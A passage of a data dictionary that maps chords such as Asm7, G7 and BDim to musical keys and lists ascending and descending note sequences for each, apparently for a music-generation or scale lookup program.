'AsMinor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'FMinor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'CHMinor': [ [ ['Gs', 'B', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'B', 'Gs'], ['Ds', 'D', 'C'] ] ],
},
'Asm7': {
'GsMajor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'CsMajor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'AsMinor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'DsMinor': [ [ ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'B', 'As'], ['F', 'Ds', 'Cs'] ] ],
'FMinor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'FsMajor': [ [ ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'B', 'As'], ['F', 'Ds', 'Cs'] ] ],
},
'Csm7': {
'CsMinor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'FsMinor': [ [ ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'D', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'GsMinor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'BMajor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'AMajor': [ [ ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'D', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'EMajor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
},
'G7': {
'CMajor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'BMinor': [ [ ['G', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'Cs', 'B'] ] ],
'GMajor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'EMinor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'CHMinor': [ [ ['G', 'Gs', 'B'], ['B', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['B', 'Gs', 'G'], ['D', 'C', 'B'] ] ],
'AMinor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'DMajor': [ [ ['G', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'Cs', 'B'] ] ],
},
'BMaj7': {
'CsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'GsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'BMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'DsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'F', 'Ds'] ] ],
'EMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'FsMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'F', 'Ds'] ] ],
},
'Ds7': {
'GsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'CMinor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'DsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'AsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'A', 'G'] ] ],
'FMinor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'GMinor': [ [ ['Ds', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'A', 'G'] ] ],
},
'AsMinor': {
'GsMajor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'CsMajor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'AsMinor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'DsMinor': [ [ ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'B', 'As'], ['F', 'Ds', 'Cs'] ] ],
'FMinor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'FsMajor': [ [ ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'B', 'As'], ['F', 'Ds', 'Cs'] ] ],
},
'AsMajor': {
'DMinor': [ [ ['As', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'E', 'D'] ] ],
'FMajor': [ [ ['As', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'E', 'D'] ] ],
'CMinor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'DsMajor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'AsMajor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'GMinor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
},
'AMaj7': {
'BMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'CsMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'Ds', 'Cs'] ] ],
'FsMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'AMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'EMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'Ds', 'Cs'] ] ],
'DMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
},
'DMajor': {
'BMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'FsMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'Gs', 'Fs'] ] ],
'GMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'EMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'AMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'Gs', 'Fs'] ] ],
'DMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
},
'AsDim': {
'GsMinor': [ [ ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'As'], ['E', 'Ds', 'Cs'] ] ],
'BMajor': [ [ ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'As'], ['E', 'Ds', 'Cs'] ] ],
},
'Fsm7': {
'BMinor': [ [ ['Fs', 'G', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'G', 'Fs'], ['Cs', 'B', 'A'] ] ],
'CsMinor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
'FsMinor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
'AMajor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
'EMajor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
'DMajor': [ [ ['Fs', 'G', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'G', 'Fs'], ['Cs', 'B', 'A'] ] ],
},
'Cs7': {
'GsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'G', 'F'] ] ],
'CsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'AsMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'DsMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'FMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'G', 'F'] ] ],
'FsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
},
'Gm7': {
'DMinor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
'FMajor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
'CMinor': [ [ ['G', 'Gs', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'Gs', 'G'], ['D', 'C', 'As'] ] ],
'DsMajor': [ [ ['G', 'Gs', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'Gs', 'G'], ['D', 'C', 'As'] ] ],
'AsMajor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
'GMinor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
},
'DDim': {
'CMinor': [ [ ['D', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'Gs'], ['F', 'Ds', 'D'], ['Gs', 'G', 'F'] ] ],
'DsMajor': [ [ ['D', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'Gs'], ['F', 'Ds', 'D'], ['Gs', 'G', 'F'] ] ],
'CHMinor': [ [ ['D', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'Gs'], ['F', 'Ds', 'D'], ['Gs', 'G', 'F'] ] ],
},
'AMajor': {
'BMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'CsMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'Ds', 'Cs'] ] ],
'FsMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'AMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'EMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'Ds', 'Cs'] ] ],
'DMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
},
'FMinor': {
'GsMajor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'CMinor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'CsMajor': [ [ ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'Fs', 'F'], ['C', 'As', 'Gs'] ] ],
'DsMajor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'AsMinor': [ [ ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'Fs', 'F'], ['C', 'As', 'Gs'] ] ],
'FMinor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'CHMinor': [ [ ['F', 'G', 'Gs'], ['Gs', 'B', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['Gs', 'G', 'F'], ['C', 'B', 'Gs'] ] ],
},
'EMajor': {
'CsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'FsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'GsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'As', 'Gs'] ] ],
'BMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'As', 'Gs'] ] ],
'AMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'EMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
},
'BDim': {
'CMajor': [ [ ['B', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'F'], ['D', 'C', 'B'], ['F', 'E', 'D'] ] ],
'CHMinor': [ [ ['B', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'Gs', 'B'] ], [ ['B', 'Gs', 'G', 'F'], ['D', 'C', 'B'], ['F', 'Ds', 'D'] ] ],
'AMinor': [ [ ['B', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'F'], ['D', 'C', 'B'], ['F', 'E', 'D'] ] ],
},
'F7': {
'CMajor': [ [ ['F', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'B', 'A'] ] ],
'DMinor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'FMajor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'AsMajor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'GMinor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'AMinor': [ [ ['F', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'B', 'A'] ] ],
},
'FMaj7': {
'CMajor': [ [ ['F', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'B', 'A'] ] ],
'DMinor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'FMajor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'AsMajor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'GMinor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'AMinor': [ [ ['F', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'B', 'A'] ] ],
},
'FsDim': {
'GMajor': [ [ ['Fs', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'C'], ['A', 'G', 'Fs'], ['C', 'B', 'A'] ] ],
'EMinor': [ [ ['Fs', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'C'], ['A', 'G', 'Fs'], ['C', 'B', 'A'] ] ],
},
'GDim': {
'GsMajor': [ [ ['G', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'G'], ['Cs', 'C', 'As'] ] ],
'FMinor': [ [ ['G', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'G'], ['Cs', 'C', 'As'] ] ],
},
'GMinor': {
'DMinor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
'FMajor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
'CMinor': [ [ ['G', 'Gs', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'Gs', 'G'], ['D', 'C', 'As'] ] ],
'DsMajor': [ [ ['G', 'Gs', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'Gs', 'G'], ['D', 'C', 'As'] ] ],
'AsMajor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
